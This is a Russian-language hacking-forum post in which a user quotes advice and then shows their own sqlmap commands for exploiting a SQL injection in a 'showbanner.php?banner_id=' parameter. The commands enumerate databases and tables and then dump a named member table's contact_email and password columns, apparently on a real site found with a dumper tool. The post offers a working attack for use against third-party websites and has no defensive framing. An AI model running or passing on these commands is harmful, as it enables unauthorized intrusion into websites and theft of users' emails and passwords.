20.01.2016, 16:29
|
|
Новичок
Регистрация: 06.12.2015
Сообщений: 23
С нами:
5493206
Репутация:
0
|
|
Сообщение от ms13
↑
Пробуй так!
sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast
где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!
Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...
Далее узнаёшь кол-во и имена таблиц в нужной БД:
sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast
где Y - имя нужной БД.
После дампишь нужную тебе таблицу:
sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast
где Z - имя нужной таблицы
Иногда, если извлекается очень медленно, можно добавить ключ
--threads 10
, например - те увеличить кол-во потоков.
C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера
|
|
|